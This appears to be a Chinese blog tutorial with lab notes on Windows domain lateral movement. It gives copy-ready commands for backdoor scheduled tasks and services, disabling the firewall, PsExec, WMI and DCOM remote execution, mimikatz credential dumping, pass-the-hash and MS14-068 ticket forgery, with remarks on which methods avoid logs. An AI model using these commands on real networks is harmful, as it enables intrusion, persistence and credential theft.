<div class="highlight-wrap" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">/Create         创建新计划任务。</span><br><span class="line">/Delete         删除计划任务。</span><br><span class="line">/Query          显示所有计划任务。</span><br><span class="line">/Change         更改计划任务属性。</span><br><span class="line">/Run            按需运行计划任务。</span><br><span class="line">/End            中止当前正在运行的计划任务。</span><br><span class="line">/s              指定要连接到的远程系统。</span><br><span class="line">/tn             指定唯一识别这个计划任务的名称。</span><br><span class="line">/mo             重复周期</span><br><span class="line">/tr             指定在这个计划时间运行的程序的路径和文件名。C:\windows\system32\calc.exe</span><br><span class="line">/f              如果指定的任务已经存在，则强制创建任务并抑制警告</span><br></pre></td></tr></table></figure></div>

<p>1.先与目标主机建立ipc连接。</p>
<p>2.然后使用copy命令远程操作，将metasploit生成的payload文件shell.exe复制到目标系统C盘中。</p>
<p>3.在目标主机DC上创建一个名称为”backdoor”的计划任务。</p>
<p>该计划任务每分钟启动一次，启动程序为我们之前到C盘下的shell.exe,启动权限为system。</p>
<div class="highlight-wrap" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">schtasks /create /s 192.168.147.190 /tn backdoor /sc minute /mo 1 /tr c:\shell.exe /ru system /f</span><br></pre></td></tr></table></figure></div>

<p>4.然后执行如下命令立即运行该计划任务(也可以自己等一分钟):</p>
<div class="highlight-wrap" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><figcaption><span>/run</span><a href="/s">192.168.183.130 /i /tn backdoor // i: 忽略任何限制立即运行任务</a></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">schtasks /run /s 192.168.147.190 /i /tn backdoor // i: 忽略任何限制立即运行任务</span><br></pre></td></tr></table></figure></div>

<p>拒绝访问时加上&#x2F;u administrator &#x2F;p password参数</p>
<p>5.计划任务成功运行后，执行如下命令强制删除该计划任务:</p>
<div class="highlight-wrap" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">schtasks /delete /s 192.168.147.190 /tn &quot;backdoor&quot; /f</span><br></pre></td></tr></table></figure></div>

<p><img src="https://b1ink.oss-cn-hangzhou.aliyuncs.com/markdown_photo-main/Intranet/image-20220313140255771.png"></p>
<p>也可以与at类似直接执行系统命令</p>
<div class="highlight-wrap" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">schtasks /create /s 192.168.147.190 /tn test /sc minute /mo 1 /tr &quot;C:\Windows\System32\cmd.exe /c &#x27;whoami &gt; C:\result.txt&#x27;&quot; /ru system /f</span><br><span class="line">schtasks /run /s 192.168.183.130 /i /tn test   //立即启动该任务</span><br></pre></td></tr></table></figure></div>

<p>在使用schtasks命令时，会在系统中留下日志文件<code>C:\Windows\Tasks\SchedLgU.txt。</code></p>
<h2 id="创建Windows服务来进行横向渗透"><a href="#创建Windows服务来进行横向渗透" class="headerlink" title="创建Windows服务来进行横向渗透"></a>创建Windows服务来进行横向渗透</h2><ul>
<li>当前跳板机用户具有管理员权限(因为要创建服务)。</li>
<li>与目标机器已经建立ipc连接</li>
</ul>
<h3 id="sc命令"><a href="#sc命令" class="headerlink" title="sc命令"></a>sc命令</h3><p>sc命令主要用来对操作系统服务进行管理</p>
<p>1.先让跳板机与内网目标机DC建立ipc连接。</p>
<p>2.然后让跳板机使用copy上传木马(以计算器测试)</p>
<p>3.再在目标主机DC上创建一个名称为”backdoor”的服务。</p>
<div class="highlight-wrap" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sc \\192.168.147.190 create testcalc binpath= &quot;C:\windows\system32\calc.exe&quot;</span><br></pre></td></tr></table></figure></div>

<p>4.立即启动该服务:</p>
<div class="highlight-wrap" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sc \\192.168.147.190 start testcalc</span><br></pre></td></tr></table></figure></div>

<p><img src="https://b1ink.oss-cn-hangzhou.aliyuncs.com/markdown_photo-main/Intranet/image-20220313142357084.png"></p>
<p><img src="https://b1ink.oss-cn-hangzhou.aliyuncs.com/markdown_photo-main/Intranet/image-20220313142413509.png"></p>
<p>5.删除服务</p>
<div class="highlight-wrap" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sc \\192.168.147.190 delete testcalc</span><br></pre></td></tr></table></figure></div>

<p>我们还可以通过设置服务来关闭防火墙</p>
<div class="highlight-wrap" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">sc \\192.168.147.190 create unablefirewall binpath= &quot;netsh advfirewall set allprofiles state off&quot;</span><br><span class="line">sc \\192.168.147.190 start unablefirewall</span><br></pre></td></tr></table></figure></div>

<h2 id="利用PsExec工具进行横向渗透"><a href="#利用PsExec工具进行横向渗透" class="headerlink" title="利用PsExec工具进行横向渗透"></a>利用PsExec工具进行横向渗透</h2><h3 id="windows下的psexec"><a href="#windows下的psexec" class="headerlink" title="windows下的psexec"></a>windows下的psexec</h3><p>psexec的使用不需要对方主机开方3389端口，只需要对方开启admin$共享  (该共享默认开启)。由于PsExec是Windows提供的工具，所以杀毒软件将其列在白名单中。</p>
<p>1.通过ipc$连接，释放二进制文件psexecsvc.exe到目标</p>
<p>2.通过服务管理SCManager远程创建一个psexec服务，并启动服务</p>
<p>3.客户端连接执行命令，服务端通过服务启动相应的程序执行命令并回显数据</p>
<p>4.运行结束后删除服务</p>
<p><strong>psexec的使用前提：</strong></p>
<ul>
<li>对方主机开启了 <code>admin$</code> 共享，如果关闭了admin$共享，会提示：找不到网络名</li>
<li>对方未开启防火墙</li>
<li>如果是工作组环境，则必须使用administrator用户连接（因为要在目标主机上面创建并启动服务），使用其他账号(包括管理员组中的非administrator用户)登录都会提示访问拒绝访问。</li>
<li>如果是域环境，即可用普通域用户连接也可以用域管理员用户连接。连接普通域主机可以用普通域用户，连接域控只能用域管理员账户。</li>
</ul>
<div class="highlight-wrap" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">PsExec64.exe -accepteula \\192.168.147.190 -u b1ink\administrator -p password -s cmd.exe</span><br><span class="line"></span><br><span class="line">-accepteula：第一次运行psexec会弹出确认框，使用该参数就不会弹出确认框</span><br><span class="line">-u：用户名</span><br><span class="line">-p：密码</span><br><span class="line">-s：以system权限运行运程进程，获得一个system权限的交互式shell。如果不使用该参数，会获得一个连接所用用户权限的shell</span><br></pre></td></tr></table></figure></div>

<p><img src="https://b1ink.oss-cn-hangzhou.aliyuncs.com/markdown_photo-main/Intranet/image-20220314102230686.png"></p>
<p>也可以直接执行命令</p>
<div class="highlight-wrap" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">psexec64.exe -accepteula \\192.168.147.190 &quot;ipconfig&quot;</span><br></pre></td></tr></table></figure></div>

<p><img src="https://b1ink.oss-cn-hangzhou.aliyuncs.com/markdown_photo-main/Intranet/image-20220314102432602.png"></p>
<h3 id="metasploit的PsExec模块"><a href="#metasploit的PsExec模块" class="headerlink" title="metasploit的PsExec模块"></a>metasploit的PsExec模块</h3><p>使用windows&#x2F;smb&#x2F;psexec测试</p>
<p><img src="https://b1ink.oss-cn-hangzhou.aliyuncs.com/markdown_photo-main/Intranet/image-20220314103015388.png"></p>
<p><strong>在使用psexec执行远程命令时，会在目标系统中创建一个psexec服务。命令执行后，psexec服务将会被自动删除。由于创建或删除服务时会产生大量的日志，所以会在攻击溯源时通过日志反推攻击流程。</strong></p>
<h2 id="利用Smbexec工具进行横向渗透"><a href="#利用Smbexec工具进行横向渗透" class="headerlink" title="利用Smbexec工具进行横向渗透"></a>利用Smbexec工具进行横向渗透</h2><p>利用 SMBExec 可以通过文件共享（<code>admin$</code>、<code>c$</code>、<code>ipc$</code>、<code>d$</code>）在远程系统中执行命令，它的工作方式类似于 PsExec</p>
<div class="highlight-wrap" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">smbexec.exe god.org/administrator:Admin12345@192.168.3.21</span><br></pre></td></tr></table></figure></div>

<p><img src="https://b1ink.oss-cn-hangzhou.aliyuncs.com/markdown_photo-main/Intranet/image-20220319151914844.png"></p>
<h2 id="利用WMI横向移动"><a href="#利用WMI横向移动" class="headerlink" title="利用WMI横向移动"></a>利用WMI横向移动</h2><p>从win98开始，windows操作系统都支持wmi。wmi由一系列工具集组成，可以在本地或远程管理计算机。使用wmiexec时，windows不会产生日志。</p>
<h3 id="wmic"><a href="#wmic" class="headerlink" title="wmic"></a>wmic</h3><p><strong>利用cmd执行命令</strong></p>
<div class="highlight-wrap" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">wmic /node:192.168.147.190 /user:administrator /password::password process call create &quot;cmd.exe /c ipconfig &gt; ip.txt&quot;</span><br></pre></td></tr></table></figure></div>

<p><strong>查看进程</strong></p>
<div class="highlight-wrap" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">wmic /node:192.168.147.190 /user:administrator /password:password process list brief</span><br></pre></td></tr></table></figure></div>

<p><img src="https://b1ink.oss-cn-hangzhou.aliyuncs.com/markdown_photo-main/Intranet/image-20220314104041713.png"></p>
<p>使用WMIC远程执行命令，在远程系统中启动WMIC服务(目标服务器需要开放其默认135端口，WMIC会以管理员权限在远程系统中执行命令)。如果目标服务器开启了防火墙，WMIC将无法连接。另外由于wmic命令没有回显，需要使用IPC$和type命令来读取信息。需要注意的是，如果WMIC执行的是恶意程序，也不会留下日志。</p>
<h3 id="wmiexec"><a href="#wmiexec" class="headerlink" title="wmiexec"></a>wmiexec</h3><p><img src="https://b1ink.oss-cn-hangzhou.aliyuncs.com/markdown_photo-main/Intranet/image-20220315110735556.png"></p>
<h2 id="DCOM"><a href="#DCOM" class="headerlink" title="DCOM"></a>DCOM</h2><p>DCOM（分布式组件对象模型）是微软基于组件对象模型（COM）的一系列概念和程序接口，它支持不同的两台机器上的组件间的通信，不论它们是运行在局域网、广域网、还是Internet上。利用这个接口，客户端程序对象能够向网络中另一台计算机上的服务器程序对象发送请求。</p>
<p>攻击者可使用 DCOM 进行横向移动，通过 DCOM，攻击者可在拥有适当权限的情况下通过 Office 应用程序以及包含不安全方法的其他 Windows 对象远程执行命令。</p>
<p>使用DCOM进行横向移动的优势之一在于，<strong>在远程主机上执行的进程将会是托管COM服务器端的软件</strong>。例如我们滥用ShellBrowserWindow COM对象，那么就会在远程主机的现有explorer.exe进程中执行。对攻击者而言，这无疑能够增强隐蔽性，由于有大量程序都会向DCOM公开方法，因此防御者可能难以全面监测所有程序的执行。</p>
<h3 id="使用-DCOM-在本地执行命令"><a href="#使用-DCOM-在本地执行命令" class="headerlink" title="使用 DCOM 在本地执行命令"></a>使用 DCOM 在本地执行命令</h3><p>在使用该方法时，需要具备以下条件：</p>
<ul>
<li>具有本地管理员权限的 PowerShell</li>
<li>需要关闭目标系统的防火墙。</li>
<li>在远程主机上执行命令时，必须使用域管的 administrator 账户或者在目标主机上具有管理员权限的账户</li>
</ul>
<p><strong>1. 获取本地DCOM程序列表</strong></p>
<div class="highlight-wrap" data-rel="Javascript"><figure class="iseeu highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="title class_">Get</span>-<span class="title class_">CimInstance</span> <span class="title class_">Win32</span>_DCOMApplication</span><br></pre></td></tr></table></figure></div>

<p>Get-CimInstance 这个cmdle（powershell命令行）默认只在powershell 3.0以上版本中存在，所以只有 Windows server 2012 及以上版本的操作系统才可以使用Get-Ciminstance。Windows 7、Windows Server 2008中默认安装的是powershell 2.0，所以他们都不支持Get-CimInstance，可以用以下命令代替Get-CimInstance：</p>
<div class="highlight-wrap" data-rel="Javascript"><figure class="iseeu highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="title class_">Get</span>-<span class="title class_">WmiObject</span> -<span class="title class_">Namespace</span> <span class="variable constant_">ROOT</span>\<span class="title class_">CIMV2</span> -<span class="title class_">Class</span> <span class="title class_">Win32</span>_DCOMApplication</span><br></pre></td></tr></table></figure></div>

<p> <strong>2. 本地使用DCOM执行任意命令</strong></p>
<p>这个COM对象可以编程MMC管理单元操作的组件脚本。我们在本地启动一个管理员权限的powershell，执行如下命令通过PowerShell与DCOM进行交互，创建一个“MMC20.Application”对象的实例（我们只需要提供一个DCOM ProgID和一个IP地址，就返回一个COM对象的实例）：</p>
<div class="highlight-wrap" data-rel="Javascript"><figure class="iseeu highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$com = [activator]::<span class="title class_">CreateInstance</span>([type]::<span class="title class_">GetTypeFromProgID</span>(<span class="string">&quot;MMC20.Application&quot;</span>,<span class="string">&quot;127.0.0.1&quot;</span>))</span><br></pre></td></tr></table></figure></div>

<p>获得COM对象的实例后，我们还可以执行如下命令枚举这个COM对象中的不同方法和属性：</p>
<div class="highlight-wrap" data-rel="Javascript"><figure class="iseeu highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"># 此时可执行如下命令获得<span class="string">&quot;MMC20.Application&quot;</span>支持的操作</span><br><span class="line">$com.<span class="property">Document</span>.<span class="property">ActiveView</span> | <span class="title class_">Get</span>-<span class="title class_">Member</span></span><br></pre></td></tr></table></figure></div>

<p>可以发现该对象有一个 ExecuteShellCommand 方法，可用来执行命令。然后再通过ExecuteShellCommand执行命令，这里启动计算器：</p>
<div class="highlight-wrap" data-rel="Javascript"><figure class="iseeu highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$com.<span class="property">Document</span>.<span class="property">ActiveView</span>.<span class="title class_">ExecuteShellCommand</span>(<span class="string">&#x27;cmd.exe&#x27;</span>,$null,<span class="string">&quot;/c calc.exe&quot;</span>,<span class="string">&quot;Minimized&quot;</span>)</span><br></pre></td></tr></table></figure></div>

<p><img src="https://b1ink.oss-cn-hangzhou.aliyuncs.com/markdown_photo-main/Intranet/image-20220316094503052.png"></p>
<h3 id="使用-DCOM-在远程主机上执行命令"><a href="#使用-DCOM-在远程主机上执行命令" class="headerlink" title="使用 DCOM 在远程主机上执行命令"></a>使用 DCOM 在远程主机上执行命令</h3><p>在使用该方法时，需要具备以下条件：</p>
<ul>
<li>具有本地管理员权限的 PowerShell</li>
<li>需要关闭目标系统的防火墙。</li>
<li>在远程主机上执行命令时，必须使用域管的 administrator 账户或者在目标主机上具有管理员权限的账户</li>
</ul>
<h4 id="调用-MMC20-Application-远程执行命令"><a href="#调用-MMC20-Application-远程执行命令" class="headerlink" title="调用 MMC20.Application 远程执行命令"></a>调用 MMC20.Application 远程执行命令</h4><div class="highlight-wrap" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">$com = [Activator]::CreateInstance([type]::GetTypeFromProgID(&quot;MMC20.Application&quot;,&quot;192.168.3.21&quot;))</span><br><span class="line">$com.Document.ActiveView.ExecuteShellCommand(&#x27;cmd.exe&#x27;,$null,&quot;/c calc.exe&quot;,&quot;Minimized&quot;)</span><br><span class="line">或者</span><br><span class="line">[Activator]::CreateInstance([type]::GetTypeFromProgID(&quot;MMC20.Application&quot;,&quot;192.168.3.21&quot;)).Document.ActiveView.ExecuteShellCommand(&#x27;cmd.exe&#x27;,$null,&quot;/c calc.exe&quot;,&quot;Minimized&quot;)</span><br></pre></td></tr></table></figure></div>

<p><img src="https://b1ink.oss-cn-hangzhou.aliyuncs.com/markdown_photo-main/Intranet/image-20220319163626310.png"></p>
<h4 id="调用-ShellWindows-远程执行命令"><a href="#调用-ShellWindows-远程执行命令" class="headerlink" title="调用 ShellWindows 远程执行命令"></a>调用 ShellWindows 远程执行命令</h4><div class="highlight-wrap" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">$com=[Activator]::CreateInstance([Type]::GetTypeFromCLSID(&#x27;9BA05972-F6A8-11CF-A442-00A0C90A8F39&#x27;,&quot;192.168.3.21&quot;))</span><br><span class="line">$com.item().Document.Application.ShellExecute(&quot;cmd.exe&quot;,&quot;/c calc.exe&quot;,&quot;c:\windows\system32&quot;,$null,0)</span><br><span class="line">或者</span><br><span class="line">[Activator]::CreateInstance([Type]::GetTypeFromCLSID(&#x27;9BA05972-F6A8-11CF-A442-00A0C90A8F39&#x27;,&quot;192.168.3.21&quot;)).item().Document.Application.ShellExecute(&quot;cmd.exe&quot;,&quot;/c calc.exe&quot;,&quot;c:\windows\system32&quot;,$null,0)</span><br></pre></td></tr></table></figure></div>

<p><img src="https://b1ink.oss-cn-hangzhou.aliyuncs.com/markdown_photo-main/Intranet/image-20220319163815204.png"></p>
<p>以上这两种方法均适用于Windows 7、Windows 10、Windows Server 2008、Windows Server 2016 的系统。</p>
<h4 id="调用-Excel-Application-远程执行命令"><a href="#调用-Excel-Application-远程执行命令" class="headerlink" title="调用 Excel.Application 远程执行命令"></a>调用 Excel.Application 远程执行命令</h4><div class="highlight-wrap" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">$com = [activator]::CreateInstance([type]::GetTypeFromprogID(&quot;Excel.Application&quot;,&quot;192.168.3.21&quot;))</span><br><span class="line">$com.DisplayAlerts = $false</span><br><span class="line">$com.DDEInitiate(&quot;cmd.exe&quot;,&quot;/c calc.exe&quot;)</span><br></pre></td></tr></table></figure></div>

<h4 id="调用-ShellBrowserWindow-远程执行命令"><a href="#调用-ShellBrowserWindow-远程执行命令" class="headerlink" title="调用 ShellBrowserWindow 远程执行命令"></a>调用 ShellBrowserWindow 远程执行命令</h4><p>适用于 Windows 10 和 Windows Server 2012 R2 等版本的系统</p>
<div class="highlight-wrap" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">$com = [activator]::CreateInstance([type]::GetTypeFromCLSID(&quot;C08AFD90-F2A1-11D1-8455-00A0C91F3880&quot;,&quot;192.168.3.21&quot;))</span><br><span class="line">$com.Document.Application.shellExecute(&quot;calc.exe&quot;)</span><br><span class="line">或者</span><br><span class="line">[activator]::CreateInstance([type]::GetTypeFromCLSID(&quot;C08AFD90-F2A1-11D1-8455-00A0C91F3880&quot;,&quot;192.168.3.21&quot;)).Document.Application.shellExecute(&quot;calc.exe&quot;)</span><br></pre></td></tr></table></figure></div>

<h4 id="调用-Visio-Application-远程执行命令"><a href="#调用-Visio-Application-远程执行命令" class="headerlink" title="调用 Visio.Application 远程执行命令"></a>调用 Visio.Application 远程执行命令</h4><p>前提是目标安装了 Visio</p>
<div class="highlight-wrap" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">$com = [activator]::CreateInstance([type]::GetTypeFromProgID(&quot;Visio.Application&quot;,&quot;192.168.3.21&quot;))</span><br><span class="line">$com.[0].Document.Application.shellExecute(&quot;calc.exe&quot;)</span><br><span class="line">或者</span><br><span class="line">[activator]::CreateInstance([type]::GetTypeFromProgID(&quot;Visio.Application&quot;,&quot;192.168.3.21&quot;)).[0].Document.Application.shellExecute(&quot;calc.exe&quot;)</span><br></pre></td></tr></table></figure></div>

<h4 id="调用-Outlook-Application-远程执行命令"><a href="#调用-Outlook-Application-远程执行命令" class="headerlink" title="调用 Outlook.Application 远程执行命令"></a>调用 Outlook.Application 远程执行命令</h4><p>前提是目标安装了 Outlook</p>
<div class="highlight-wrap" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">$com = [activator]::CreateInstance([type]::GetTypeFromProgID(&quot;Outlook.Application&quot;,&quot;192.168.3.21&quot;))</span><br><span class="line">$com.createObject(&quot;Shell.Application&quot;).shellExecute(&quot;192.168.3.21&quot;)</span><br><span class="line">或者</span><br><span class="line">[activator]::CreateInstance([type]::GetTypeFromProgID(&quot;Outlook.Application&quot;,&quot;192.168.3.21&quot;)).createObject(&quot;Shell.Application&quot;).shellExecute(&quot;calc.exe&quot;)</span><br></pre></td></tr></table></figure></div>

<h3 id="dcomexec"><a href="#dcomexec" class="headerlink" title="dcomexec"></a>dcomexec</h3><p>该脚本可以提供一个类似于 wmiexec.py 脚本的半交互式 shell，不过使用的是 DCOM</p>
<p>dcomexec.py 脚本目前支持 MMC20.Application、ShellWindows 和 ShellBrowserWindow 对象。</p>
<div class="highlight-wrap" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">dcomexec.exe god.org/administrator:Admin12345@192.168.3.21</span><br></pre></td></tr></table></figure></div>

<p><img src="https://b1ink.oss-cn-hangzhou.aliyuncs.com/markdown_photo-main/Intranet/image-20220319164714029.png"></p>
<h2 id="Hash传递攻击"><a href="#Hash传递攻击" class="headerlink" title="Hash传递攻击"></a>Hash传递攻击</h2><p>在域环境中，用户登录计算机时一般使用域账号，大量计算机在安装时会使用相同的本地管理员账号和密码，因此，如果计算机的本地管理员账号和密码也相同，攻击者就能使用哈希传递攻击的方法来登录内网中的其他主机。</p>
<p>Pass The Hash 哈希传递攻击简称 PTH，该方法通过找到与账户相关的密码散列值（NTLM Hash）来进行攻击。由于在Windows系统中，通常会使用NTLM Hash对访问资源的用户进行身份认证，所以该攻击可以在不需要明文密码的情况下，利用LM HASH和NTLM HASH直接远程登录目标主机或反弹shell。要使用哈希传递攻击，则必须要获取目标机器的管理员权限。</p>
<h3 id="SMB渗透至Hash传递攻击的原理"><a href="#SMB渗透至Hash传递攻击的原理" class="headerlink" title="SMB渗透至Hash传递攻击的原理"></a>SMB渗透至Hash传递攻击的原理</h3><p>SMB可以直接基于TCP协议或者NetBIOS over TCP，SMB的认证可以基于SMB，也可以基于kerberos，，这两种认证方式，前者本质上使用了hash，后者本质上使用了ticket，导致了SMB的PtH和PtT攻击存在的基础。</p>
<h3 id="mimikatz"><a href="#mimikatz" class="headerlink" title="mimikatz"></a>mimikatz</h3><div class="highlight-wrap" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">privilege::debug</span><br><span class="line">sekurlsa::logonpasswords</span><br><span class="line">sekurlsa::pth /user:administrator /domain:b1ink /ntlm:hash</span><br></pre></td></tr></table></figure></div>

<p><img src="https://b1ink.oss-cn-hangzhou.aliyuncs.com/markdown_photo-main/Intranet/image-20220315125448342.png"></p>
<h3 id="MSF"><a href="#MSF" class="headerlink" title="MSF"></a>MSF</h3><p>exploit&#x2F;windows&#x2F;smb&#x2F;psexec            &#x2F;&#x2F; 用psexec执行系统命令         exploit&#x2F;windows&#x2F;smb&#x2F;psexec_psh         &#x2F;&#x2F; 使用powershell作为payload,该payload不写入磁盘，并且每一个payload都是唯一的</p>
<h3 id="wmic-1"><a href="#wmic-1" class="headerlink" title="wmic"></a>wmic</h3><div class="highlight-wrap" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">wmic.exe -hashes LM Hash:NT Hash 域名/用户名@ip &quot;ipconfig&quot;</span><br></pre></td></tr></table></figure></div>

<h2 id="票据传递攻击PTT"><a href="#票据传递攻击PTT" class="headerlink" title="票据传递攻击PTT"></a>票据传递攻击PTT</h2><p>PTT是基于Kerberos协议进行攻击的,通过传递kerberos的ticket，登录机器，可在没有管理员权限时使用</p>
<p>在票据传递攻击（PTT）中，我们常用的有MS14-068、黄金票据、白银票据。其中MS14-068可用来横向获取域内主机权限，黄金票据、白银票据则可以用来对域控进行权限维持。</p>
<h3 id="MS14-068"><a href="#MS14-068" class="headerlink" title="MS14-068"></a>MS14-068</h3><p>补丁编号是KB3011780，域里面最严重的漏洞之一，它允许任意用户提升到域管权限。</p>
<p>该漏洞最本质的地方在于<strong>Microsoft Windows Kerberos KDC无法正确检查Kerberos票证请求随附的特权属性证书（PAC）中的有效签名</strong>，它允许经过身份验证的用户在其Kerberos票证（TGT）中插入任意的PAC（表示所有用户权限的结构）。该漏洞位于kdcsvc.dll域控制器的密钥分发中心(KDC)中。普通用户可以通过呈现具有改变了PAC的Kerberos TGT来获得票证，进而伪造票据获得管理员权限。</p>
<ul>
<li>域内任意用户SID</li>
<li>域内任意用户密码</li>
</ul>
<p>首先获得域用户的SID</p>
<p><img src="https://b1ink.oss-cn-hangzhou.aliyuncs.com/markdown_photo-main/Intranet/image-20220315133654271.png"></p>
<p>S-1-5-21-3663526100-379775499-2037882308-1104</p>
<p>再利用msf14-068生成TGT票据</p>
<div class="highlight-wrap" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">MS14-068.exe -u administrator@b1ink.club -s S-1-5-21-3663526100-379775499-2037882308-1104 -d 192.168.147.197 -p password</span><br></pre></td></tr></table></figure></div>

<p><img src="https://b1ink.oss-cn-hangzhou.aliyuncs.com/markdown_photo-main/Intranet/image-20220315140344624.png"></p>
<div class="highlight-wrap" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">mimikatz # kerberos::purge         //清空当前机器中所有凭证，如果有域成员凭证会影响凭证伪造</span><br><span class="line">mimikatz # kerberos::list          //查看当前机器凭证</span><br><span class="line">mimikatz # kerberos::ptc 票据文件   //将票据注入到内存中</span><br></pre></td></tr></table></figure></div>

<p><img src="https://b1ink.oss-cn-hangzhou.aliyuncs.com/markdown_photo-main/Intranet/image-20220315141129873.png"></p>
<p>此时，攻击者就可以利用Windows 7可任意访问域中所有机器，可以使用net use进行登录或者使用psexec，wmi等方法进行远程执行命令。</p>
<p>也可使用msf</p>
<div class="highlight-wrap" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">use auxiliary/admin/kerberos/ms14_068_kerberos_checksum</span><br><span class="line">set domain god.org</span><br><span class="line">set password admin!@#45</span><br><span class="line">set user mary</span><br><span class="line">set user_sid S-1-5-21-1218902331-2157346161-1782232778-1124</span><br><span class="line">set rhosts 192.168.147.156</span><br><span class="line">run</span><br></pre></td></tr></table></figure></div>

<p><img src="https://b1ink.oss-cn-hangzhou.aliyuncs.com/markdown_photo-main/Intranet/image-20220318105303042.png"></p>
<p>将此文件导入</p>
<p><img src="https://b1ink.oss-cn-hangzhou.aliyuncs.com/markdown_photo-main/Intranet/image-20220318181935519.png"></p>
<p>获得权限</p>
<p><img src="https://b1ink.oss-cn-hangzhou.aliyuncs.com/markdown_photo-main/Intranet/image-20220318182014227.png"></p>
<h3 id="mimikatz导出票据"><a href="#mimikatz导出票据" class="headerlink" title="mimikatz导出票据"></a>mimikatz导出票据</h3><div class="highlight-wrap" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">privilege::debug</span><br><span class="line">sekurlsa::tickets /export</span><br><span class="line">kerberos::ptt &quot;&quot;</span><br></pre></td></tr></table></figure></div>

<p><img src="https://b1ink.oss-cn-hangzhou.aliyuncs.com/markdown_photo-main/Intranet/image-20220316151707163.png"></p>
